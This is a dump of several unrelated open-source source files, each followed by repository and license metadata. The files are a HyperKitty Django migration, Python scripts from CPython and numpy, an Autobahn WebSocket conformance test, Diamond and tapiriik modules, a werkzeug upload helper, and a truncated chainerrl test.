db.create_index(u'hyperkitty_email', ['in_reply_to'])
def backwards(self, orm):
# Removing index on 'Email', fields ['in_reply_to']
db.delete_index(u'hyperkitty_email', ['in_reply_to'])
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'hyperkitty.attachment': {
'Meta': {'unique_together': "((u'email', u'counter'),)", 'object_name': 'Attachment'},
'content': ('django.db.models.fields.BinaryField', [], {}),
'content_type': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'counter': ('django.db.models.fields.SmallIntegerField', [], {}),
'email': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'attachments'", 'to': u"orm['hyperkitty.Email']"}),
'encoding': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'size': ('django.db.models.fields.IntegerField', [], {})
},
u'hyperkitty.email': {
'Meta': {'unique_together': "((u'mailinglist', u'message_id'),)", 'object_name': 'Email'},
'archived_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_reply_to': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'mailinglist': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'emails'", 'to': u"orm['hyperkitty.MailingList']"}),
'message_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'message_id_hash': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'children'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['hyperkitty.Email']"}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'emails'", 'to': u"orm['hyperkitty.Sender']"}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': "u'512'", 'db_index': 'True'}),
'thread': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'emails'", 'to': u"orm['hyperkitty.Thread']"}),
'thread_depth': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'thread_order': ('django.db.models.fields.IntegerField', [], {'default': '0', 'db_index': 'True'}),
'timezone': ('django.db.models.fields.SmallIntegerField', [], {})
},
u'hyperkitty.favorite': {
'Meta': {'object_name': 'Favorite'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'thread': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'favorites'", 'to': u"orm['hyperkitty.Thread']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'favorites'", 'to': u"orm['auth.User']"})
},
u'hyperkitty.lastview': {
'Meta': {'object_name': 'LastView'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'thread': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'lastviews'", 'to': u"orm['hyperkitty.Thread']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'lastviews'", 'to': u"orm['auth.User']"}),
'view_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'hyperkitty.mailinglist': {
'Meta': {'object_name': 'MailingList'},
'archive_policy': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '254', 'primary_key': 'True'}),
'subject_prefix': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'hyperkitty.profile': {
'Meta': {'object_name': 'Profile'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'karma': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'timezone': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '100'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'hyperkitty_profile'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
u'hyperkitty.sender': {
'Meta': {'object_name': 'Sender'},
'address': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'primary_key': 'True'}),
'mailman_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'hyperkitty.tag': {
'Meta': {'ordering': "[u'name']", 'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'threads': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'tags'", 'symmetrical': 'False', 'through': u"orm['hyperkitty.Tagging']", 'to': u"orm['hyperkitty.Thread']"}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'tags'", 'symmetrical': 'False', 'through': u"orm['hyperkitty.Tagging']", 'to': u"orm['auth.User']"})
},
u'hyperkitty.tagging': {
'Meta': {'object_name': 'Tagging'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['hyperkitty.Tag']"}),
'thread': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['hyperkitty.Thread']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'hyperkitty.thread': {
'Meta': {'unique_together': "((u'mailinglist', u'thread_id'),)", 'object_name': 'Thread'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'threads'", 'null': 'True', 'to': u"orm['hyperkitty.ThreadCategory']"}),
'date_active': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mailinglist': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'threads'", 'to': u"orm['hyperkitty.MailingList']"}),
'thread_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
},
u'hyperkitty.threadcategory': {
'Meta': {'object_name': 'ThreadCategory'},
'color': ('paintstore.fields.ColorPickerField', [], {'max_length': '7'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
u'hyperkitty.vote': {
'Meta': {'unique_together': "((u'email', u'user'),)", 'object_name': 'Vote'},
'email': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'votes'", 'to': u"orm['hyperkitty.Email']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'votes'", 'to': u"orm['auth.User']"}),
'value': ('django.db.models.fields.SmallIntegerField', [], {'db_index': 'True'})
}
}
complete_apps = ['hyperkitty']
|
gpl-3.0
|
glwu/python-for-android
|
python3-alpha/python3-src/Tools/scripts/finddiv.py
|
49
|
2498
|
#! /usr/bin/env python3
"""finddiv - a grep-like tool that looks for division operators.
Usage: finddiv [-l] file_or_directory ...
For directory arguments, all files in the directory whose name ends in
.py are processed, and subdirectories are processed recursively.
This actually tokenizes the files to avoid false hits in comments or
string literals.
By default, this prints all lines containing a / or /= operator, in
grep -n style. With the -l option specified, it only prints the filenames
of files that contain at least one / or /= operator.
"""
import os
import sys
import getopt
import tokenize
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "lh")
except getopt.error as msg:
usage(msg)
return 2
if not args:
usage("at least one file argument is required")
return 2
listnames = 0
for o, a in opts:
if o == "-h":
print(__doc__)
return
if o == "-l":
listnames = 1
exit = None
for filename in args:
x = process(filename, listnames)
exit = exit or x
return exit
def usage(msg):
sys.stderr.write("%s: %s\n" % (sys.argv[0], msg))
sys.stderr.write("Usage: %s [-l] file ...\n" % sys.argv[0])
sys.stderr.write("Try `%s -h' for more information.\n" % sys.argv[0])
def process(filename, listnames):
if os.path.isdir(filename):
return processdir(filename, listnames)
try:
fp = open(filename)
except IOError as msg:
sys.stderr.write("Can't open: %s\n" % msg)
return 1
g = tokenize.generate_tokens(fp.readline)
lastrow = None
for type, token, (row, col), end, line in g:
if token in ("/", "/="):
if listnames:
print(filename)
break
if row != lastrow:
lastrow = row
print("%s:%d:%s" % (filename, row, line), end=' ')
fp.close()
def processdir(dir, listnames):
try:
names = os.listdir(dir)
except os.error as msg:
sys.stderr.write("Can't list directory: %s\n" % dir)
return 1
files = []
for name in names:
fn = os.path.join(dir, name)
if os.path.normcase(fn).endswith(".py") or os.path.isdir(fn):
files.append(fn)
files.sort(key=os.path.normcase)
exit = None
for fn in files:
x = process(fn, listnames)
exit = exit or x
return exit
if __name__ == "__main__":
sys.exit(main())
|
apache-2.0
|
crossbario/autobahn-testsuite
|
autobahntestsuite/autobahntestsuite/case/case5_2.py
|
2
|
1372
|
###############################################################################
##
## Copyright (c) Crossbar.io Technologies GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from case import Case
class Case5_2(Case):
DESCRIPTION = """Send Pong fragmented into 2 fragments."""
EXPECTATION = """Connection is failed immediately, since control message MUST NOT be fragmented."""
def onOpen(self):
self.expected[Case.OK] = []
self.expectedClose = {"closedByMe":False,"closeCode":[self.p.CLOSE_STATUS_CODE_PROTOCOL_ERROR],"requireClean":False}
self.p.sendFrame(opcode = 10, fin = False, payload = "fragment1")
self.p.sendFrame(opcode = 0, fin = True, payload = "fragment2")
self.p.killAfter(1)
|
apache-2.0
|
Eric89GXL/numpy
|
numpy/distutils/conv_template.py
|
18
|
9732
|
#!/usr/bin/env python
"""
takes templated file .xxx.src and produces .xxx file where .xxx is
.i or .c or .h, using the following template rules
/**begin repeat -- on a line by itself marks the start of a repeated code
segment
/**end repeat**/ -- on a line by itself marks its end
After the /**begin repeat and before the */, all the named templates are placed;
these should all have the same number of replacements
Repeat blocks can be nested, with each nested block labeled with its depth,
i.e.
/**begin repeat1
*....
*/
/**end repeat1**/
When using nested loops, you can optionally exclude particular
combinations of the variables using (inside the comment portion of the inner loop):
:exclude: var1=value1, var2=value2, ...
This will exclude the pattern where var1 is value1 and var2 is value2 when
the result is being generated.
In the main body each replace will use one entry from the list of named replacements
Note that all #..# forms in a block must have the same number of
comma-separated entries.
Example:
An input file containing
/**begin repeat
* #a = 1,2,3#
* #b = 1,2,3#
*/
/**begin repeat1
* #c = ted, jim#
*/
@a@, @b@, @c@
/**end repeat1**/
/**end repeat**/
produces
line 1 "template.c.src"
/*
*********************************************************************
** This file was autogenerated from a template DO NOT EDIT!!**
** Changes should be made to the original source (.src) file **
*********************************************************************
*/
#line 9
1, 1, ted
#line 9
1, 1, jim
#line 9
2, 2, ted
#line 9
2, 2, jim
#line 9
3, 3, ted
#line 9
3, 3, jim
"""
from __future__ import division, absolute_import, print_function
__all__ = ['process_str', 'process_file']
import os
import sys
import re
from numpy.distutils.compat import get_exception
# names for replacement that are already global.
global_names = {}
# header placed at the front of each processed file
header =\
"""
/*
*****************************************************************************
** This file was autogenerated from a template DO NOT EDIT!!!! **
** Changes should be made to the original source (.src) file **
*****************************************************************************
*/
"""
# Parse string for repeat loops
def parse_structure(astr, level):
"""
The returned line number is from the beginning of the string, starting
at zero. Returns an empty list if no loops found.
"""
if level == 0 :
loopbeg = "/**begin repeat"
loopend = "/**end repeat**/"
else :
loopbeg = "/**begin repeat%d" % level
loopend = "/**end repeat%d**/" % level
ind = 0
line = 0
spanlist = []
while True:
start = astr.find(loopbeg, ind)
if start == -1:
break
start2 = astr.find("*/", start)
start2 = astr.find("\n", start2)
fini1 = astr.find(loopend, start2)
fini2 = astr.find("\n", fini1)
line += astr.count("\n", ind, start2+1)
spanlist.append((start, start2+1, fini1, fini2+1, line))
line += astr.count("\n", start2+1, fini2)
ind = fini2
spanlist.sort()
return spanlist
def paren_repl(obj):
torep = obj.group(1)
numrep = obj.group(2)
return ','.join([torep]*int(numrep))
parenrep = re.compile(r"[(]([^)]*)[)]\*(\d+)")
plainrep = re.compile(r"([^*]+)\*(\d+)")
def parse_values(astr):
# replaces all occurrences of '(a,b,c)*4' in astr
# with 'a,b,c,a,b,c,a,b,c,a,b,c'. Empty parentheses generate
# empty values, i.e., ()*4 yields ',,,'. The result is
# split at ',' and a list of values returned.
astr = parenrep.sub(paren_repl, astr)
# replaces occurrences of xxx*3 with xxx, xxx, xxx
astr = ','.join([plainrep.sub(paren_repl, x.strip())
for x in astr.split(',')])
return astr.split(',')
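# Illustrative example (not part of the original module):
#     parse_values("(a,b)*2, c*3") -> ['a', 'b', 'a', 'b', 'c', 'c', 'c']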
stripast = re.compile(r"\n\s*\*?")
named_re = re.compile(r"#\s*(\w*)\s*=([^#]*)#")
exclude_vars_re = re.compile(r"(\w*)=(\w*)")
exclude_re = re.compile(":exclude:")
def parse_loop_header(loophead) :
"""Find all named replacements in the header
Returns a list of dictionaries, one for each loop iteration,
where each key is a name to be substituted and the corresponding
value is the replacement string.
Also return a list of exclusions. The exclusions are dictionaries
of key value pairs. There can be more than one exclusion.
[{'var1':'value1', 'var2':'value2'[, ...]}, ...]
"""
# Strip out '\n' and leading '*', if any, in continuation lines.
# This should not affect code previous to this change as
# continuation lines were not allowed.
loophead = stripast.sub("", loophead)
# parse out the names and lists of values
names = []
reps = named_re.findall(loophead)
nsub = None
for rep in reps:
name = rep[0]
vals = parse_values(rep[1])
size = len(vals)
if nsub is None :
nsub = size
elif nsub != size :
msg = "Mismatch in number of values, %d != %d\n%s = %s"
raise ValueError(msg % (nsub, size, name, vals))
names.append((name, vals))
# Find any exclude variables
excludes = []
for obj in exclude_re.finditer(loophead):
span = obj.span()
# find next newline
endline = loophead.find('\n', span[1])
substr = loophead[span[1]:endline]
ex_names = exclude_vars_re.findall(substr)
excludes.append(dict(ex_names))
# generate list of dictionaries, one for each template iteration
dlist = []
if nsub is None :
raise ValueError("No substitution variables found")
for i in range(nsub) :
tmp = {}
for name, vals in names :
tmp[name] = vals[i]
dlist.append(tmp)
return dlist
replace_re = re.compile(r"@([\w]+)@")
def parse_string(astr, env, level, line) :
lineno = "#line %d\n" % line
# local function for string replacement, uses env
def replace(match):
name = match.group(1)
try :
val = env[name]
except KeyError:
msg = 'line %d: no definition of key "%s"'%(line, name)
raise ValueError(msg)
return val
code = [lineno]
struct = parse_structure(astr, level)
if struct :
# recurse over inner loops
oldend = 0
newlevel = level + 1
for sub in struct:
pref = astr[oldend:sub[0]]
head = astr[sub[0]:sub[1]]
text = astr[sub[1]:sub[2]]
oldend = sub[3]
newline = line + sub[4]
code.append(replace_re.sub(replace, pref))
try :
envlist = parse_loop_header(head)
except ValueError:
e = get_exception()
msg = "line %d: %s" % (newline, e)
raise ValueError(msg)
for newenv in envlist :
newenv.update(env)
newcode = parse_string(text, newenv, newlevel, newline)
code.extend(newcode)
suff = astr[oldend:]
code.append(replace_re.sub(replace, suff))
else :
# replace keys
code.append(replace_re.sub(replace, astr))
code.append('\n')
return ''.join(code)
def process_str(astr):
code = [header]
code.extend(parse_string(astr, global_names, 0, 1))
return ''.join(code)
include_src_re = re.compile(r"(\n|\A)#include\s*['\"]"
r"(?P<name>[\w\d./\\]+[.]src)['\"]", re.I)
def resolve_includes(source):
d = os.path.dirname(source)
fid = open(source)
lines = []
for line in fid:
m = include_src_re.match(line)
if m:
fn = m.group('name')
if not os.path.isabs(fn):
fn = os.path.join(d, fn)
if os.path.isfile(fn):
print('Including file', fn)
lines.extend(resolve_includes(fn))
else:
lines.append(line)
else:
lines.append(line)
fid.close()
return lines
def process_file(source):
lines = resolve_includes(source)
sourcefile = os.path.normcase(source).replace("\\", "\\\\")
try:
code = process_str(''.join(lines))
except ValueError:
e = get_exception()
raise ValueError('In "%s" loop at %s' % (sourcefile, e))
return '#line 1 "%s"\n%s' % (sourcefile, code)
def unique_key(adict):
# this obtains a unique key given a dictionary
# currently it works by appending together n of the letters of the
# current keys and increasing n until a unique key is found
# -- not particularly quick
allkeys = list(adict.keys())
done = False
n = 1
while not done:
newkey = "".join([x[:n] for x in allkeys])
if newkey in allkeys:
n += 1
else:
done = True
return newkey
def main():
try:
file = sys.argv[1]
except IndexError:
fid = sys.stdin
outfile = sys.stdout
else:
fid = open(file, 'r')
(base, ext) = os.path.splitext(file)
newname = base
outfile = open(newname, 'w')
allstr = fid.read()
try:
writestr = process_str(allstr)
except ValueError:
e = get_exception()
raise ValueError("In %s loop at %s" % (file, e))
outfile.write(writestr)
if __name__ == "__main__":
main()
|
bsd-3-clause
|
abhijit86k/tapiriik
|
tapiriik/services/auto_pause.py
|
15
|
4729
|
import itertools
from collections import defaultdict
from tapiriik.services.interchange import WaypointType
def pairwise(gen):
x, y = itertools.tee(gen)
next(y, None)
return zip(x, y)
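# Illustrative example (not part of the original module):
#     list(pairwise([1, 2, 3])) -> [(1, 2), (2, 3)]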
class AutoPauseCalculator:
@classmethod
def calculate(cls, waypoints, target_duration):
if not waypoints:
yield from ()
return
if type(target_duration) not in [float, int]:
target_duration = target_duration.total_seconds()
# First, get a list of the inter-waypoint durations and distance deltas
inter_wp_times = []
inter_wp_distances_with_times = [] # Not in any real units
delta_t_frequencies = defaultdict(int)
for wp_a, wp_b in pairwise(waypoints):
delta_t = (wp_b.Timestamp - wp_a.Timestamp).total_seconds()
delta_t_frequencies[round(delta_t)] += 1
inter_wp_times.append(delta_t)
if wp_a.Location and wp_b.Location and wp_a.Location.Latitude is not None and wp_b.Location.Latitude is not None:
inter_wp_distances_with_times.append(((wp_a.Location.Latitude - wp_b.Location.Latitude) ** 2 + (wp_a.Location.Longitude - wp_b.Location.Longitude) ** 2, delta_t))
inter_wp_times.sort(reverse=True)
inter_wp_distances_with_times.sort(key=lambda x: x[0])
# Guesstimate what the sampling rate is
delta_t_mode = sorted(delta_t_frequencies.items(), key=lambda x: x[1])[-1][0]
# ...should sum to the elapsed duration, so we'll cheat
elapsed_duration = (waypoints[-1].Timestamp - waypoints[0].Timestamp).total_seconds()
# Then, walk through our list until we recover enough time - call this the auto-pause threshold for time
# This is an attempt to discover times when they paused the activity (missing data for a significant period of time)
recovered_duration = 0
auto_pause_time_threshold = None
inter_times_iter = iter(inter_wp_times)
try:
while elapsed_duration - recovered_duration > target_duration:
new_thresh = next(inter_times_iter)
# Bail out before we enter the zone of pausing the entire activity
if new_thresh <= delta_t_mode * 2:
break
auto_pause_time_threshold = new_thresh
recovered_duration += auto_pause_time_threshold
except StopIteration:
pass
# And the same for distances, if we didn't find enough time via the inter-waypoint time method
# This is the traditional "auto-pause" where, if the user is stationary the activity is paused
# So, we look for points where they were moving the least and pause during them
auto_pause_dist_threshold = None
inter_dist_iter = iter(inter_wp_distances_with_times)
try:
while elapsed_duration - recovered_duration > target_duration:
auto_pause_dist_threshold, delta_t = next(inter_dist_iter)
recovered_duration += delta_t
except StopIteration:
pass
if auto_pause_dist_threshold == 0:
raise ValueError("Bad auto-pause distance threshold %f" % auto_pause_dist_threshold)
# Then re-iterate through our waypoints and return the waypoint type (regular/pause/resume) for each
# We do this instead of overwriting the waypoint values since that would mess up uploads to other services that don't want this automatic calculation
# We decrement recovered_duration back to 0 and stop adding pauses after that point, in the hopes of having the best success hitting the target duration
in_pause = False
for wp_a, wp_b in pairwise(waypoints):
delta_t = (wp_b.Timestamp - wp_a.Timestamp).total_seconds()
delta_d = None
if wp_a.Location and wp_b.Location and wp_a.Location.Latitude is not None and wp_b.Location.Latitude is not None:
delta_d = (wp_a.Location.Latitude - wp_b.Location.Latitude) ** 2 + (wp_a.Location.Longitude - wp_b.Location.Longitude) ** 2
if ((auto_pause_time_threshold is not None and delta_t > auto_pause_time_threshold) or (auto_pause_dist_threshold is not None and delta_d is not None and delta_d < auto_pause_dist_threshold)) and recovered_duration > 0:
recovered_duration -= delta_t
yield WaypointType.Pause
in_pause = True
else:
yield WaypointType.Resume if in_pause else WaypointType.Regular
in_pause = False
# Since we were iterating pairwise above, we need 1 extra for the last waypoint
yield WaypointType.Resume if in_pause else WaypointType.Regular
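# A minimal usage sketch (illustrative, not part of the original module; "waypoints" stands for
# the activity's list of Waypoint objects and the target is the desired moving time in seconds
# or as a timedelta):
#     waypoint_types = list(AutoPauseCalculator.calculate(waypoints, 3600))
#     # one WaypointType (Regular / Pause / Resume) per input waypoint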
|
apache-2.0
|
Ssawa/Diamond
|
src/diamond/handler/statsite.py
|
57
|
5987
|
# coding=utf-8
"""
Send metrics to a [Statsite](https://github.com/armon/statsite/)
using the default interface.
Statsite
========
This is a stats aggregation server. Statsite is based heavily
on Etsy's [StatsD](https://github.com/etsy/statsd). This is
a re-implementation of the Python version of
[statsite](https://github.com/kiip/statsite).
Features
--------
* Basic key/value metrics
* Send timer data, statsite will calculate:
- Mean
- Min/Max
- Standard deviation
- Median, Percentile 95, Percentile 99
* Send counters that statsite will aggregate
Architecture
-------------
Statsite is designed to be both highly performant,
and very flexible. To achieve this, it implements the stats
collection and aggregation in pure C, using libev to be
extremely fast. This allows it to handle hundreds of connections,
and millions of metrics. After each flush interval expires,
statsite performs a fork/exec to start a new stream handler
invoking a specified application. Statsite then streams the
aggregated metrics over stdin to the application, which is
free to handle the metrics as it sees fit.
This allows statsite to aggregate metrics and then ship metrics
to any number of sinks (Graphite, SQL databases, etc). There
is an included Python script that ships metrics to graphite.
Additionally, statsite tries to minimize memory usage by not
storing all the metrics that are received. Counter values are
aggregated as they are received, and timer values are stored
and aggregated using the Cormode-Muthukrishnan algorithm from
"Effective Computation of Biased Quantiles over Data Streams".
This means that the percentile values are not perfectly accurate,
and are subject to a specifiable error epsilon. This allows us to
store only a fraction of the samples.
"""
from Handler import Handler
import socket
class StatsiteHandler(Handler):
"""
Implements the abstract Handler class, sending data to statsite
"""
RETRY = 3
def __init__(self, config=None):
"""
Create a new instance of the StatsiteHandler class
"""
# Initialize Handler
Handler.__init__(self, config)
# Initialize Data
self.socket = None
# Initialize Options
self.host = self.config['host']
self.tcpport = int(self.config['tcpport'])
self.udpport = int(self.config['udpport'])
self.timeout = int(self.config['timeout'])
# Connect
self._connect()
def get_default_config_help(self):
"""
Returns the help text for the configuration options for this handler
"""
config = super(StatsiteHandler, self).get_default_config_help()
config.update({
'host': '',
'tcpport': '',
'udpport': '',
'timeout': '',
})
return config
def get_default_config(self):
"""
Return the default config for the handler
"""
config = super(StatsiteHandler, self).get_default_config()
config.update({
'host': '',
'tcpport': 1234,
'udpport': 1234,
'timeout': 5,
})
return config
def __del__(self):
"""
Destroy instance of the StatsiteHandler class
"""
self._close()
def process(self, metric):
"""
Process a metric by sending it to statsite
"""
# Just send the data as a string
self._send(str(metric))
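# Illustrative wire format produced by _send below (assuming a metric string of the usual
# Diamond form "path value timestamp"; the values here are made up):
#     "servers.host1.cpu.total.idle 99 1329168255" -> "servers.host1.cpu.total.idle:99|kv\n"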
def _send(self, data):
"""
Send data to statsite. Data that can not be sent will be queued.
"""
retry = self.RETRY
# Attempt to send any data in the queue
while retry > 0:
# Check socket
if not self.socket:
# Log Error
self.log.error("StatsiteHandler: Socket unavailable.")
# Attempt to re-establish connection
self._connect()
# Decrement retry
retry -= 1
# Try again
continue
try:
# Send data to socket
data = data.split()
data = data[0] + ":" + data[1] + "|kv\n"
self.socket.sendall(data)
# Done
break
except socket.error, e:
# Log Error
self.log.error("StatsiteHandler: Failed sending data. %s.", e)
# Attempt to re-establish connection
self._close()
# Decrement retry
retry -= 1
# try again
continue
def _connect(self):
"""
Connect to the statsite server
"""
# Create socket
if self.udpport > 0:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = self.udpport
elif self.tcpport > 0:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = self.tcpport
if self.socket is None:
# Log Error
self.log.error("StatsiteHandler: Unable to create socket.")
# Close Socket
self._close()
return
# Set socket timeout
self.socket.settimeout(self.timeout)
# Connect to statsite server
try:
self.socket.connect((self.host, self.port))
# Log
self.log.debug("Established connection to statsite server %s:%d",
self.host, self.port)
except Exception, ex:
# Log Error
self.log.error("StatsiteHandler: Failed to connect to %s:%i. %s",
self.host, self.port, ex)
# Close Socket
self._close()
return
def _close(self):
"""
Close the socket
"""
if self.socket is not None:
self.socket.close()
self.socket = None
|
mit
|
bravominski/PennApps2015-HeartMates
|
venv/lib/python2.7/site-packages/werkzeug/testsuite/multipart/collect.py
|
248
|
1584
|
#!/usr/bin/env python
"""
Hacky helper application to collect form data.
"""
from werkzeug.serving import run_simple
from werkzeug.wrappers import Request, Response
def copy_stream(request):
from os import mkdir
from time import time
folder = 'request-%d' % time()
mkdir(folder)
environ = request.environ
f = open(folder + '/request.txt', 'wb+')
f.write(environ['wsgi.input'].read(int(environ['CONTENT_LENGTH'])))
f.flush()
f.seek(0)
environ['wsgi.input'] = f
request.stat_folder = folder
def stats(request):
copy_stream(request)
f1 = request.files['file1']
f2 = request.files['file2']
text = request.form['text']
f1.save(request.stat_folder + '/file1.bin')
f2.save(request.stat_folder + '/file2.bin')
open(request.stat_folder + '/text.txt', 'w').write(text.encode('utf-8'))
return Response('Done.')
def upload_file(request):
return Response('''
<h1>Upload File</h1>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file1"><br>
<input type="file" name="file2"><br>
<textarea name="text"></textarea><br>
<input type="submit" value="Send">
</form>
''', mimetype='text/html')
def application(environ, start_response):
request = Request(environ)
if request.method == 'POST':
response = stats(request)
else:
response = upload_file(request)
return response(environ, start_response)
if __name__ == '__main__':
run_simple('localhost', 5000, application, use_debugger=True)
|
apache-2.0
|
toslunar/chainerrl
|
tests/experiments_tests/test_train_agent_batch.py
|
1
|
5850
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import * # NOQA
from future import standard_library
standard_library.install_aliases() # NOQA
import math
import tempfile
import unittest
from chainer import testing
import mock
import chainerrl
@testing.parameterize(*testing.product({
'num_envs': [1, 2],
'max_episode_len': [None, 2],
'steps': [5, 6],
}))
class TestTrainAgentBatch(unittest.TestCase):
def test(self):
steps = self.steps
outdir = tempfile.mkdtemp()
agent = mock.Mock()
agent.batch_act_and_train.side_effect = [[1] * self.num_envs] * 1000
def make_env():
env = mock.Mock()
env.reset.side_effect = [('state', 0)] * 1000
if self.max_episode_len is None:
# Episodic env that terminates after 5 actions
env.step.side_effect = [
(('state', 1), 0, False, {}),
(('state', 2), 0, False, {}),
(('state', 3), -0.5, False, {}),
(('state', 4), 0, False, {}),
(('state', 5), 1, True, {}),
] * 1000
else:
# Continuing env
env.step.side_effect = [
(('state', 1), 0, False, {}),
] * 1000
return env
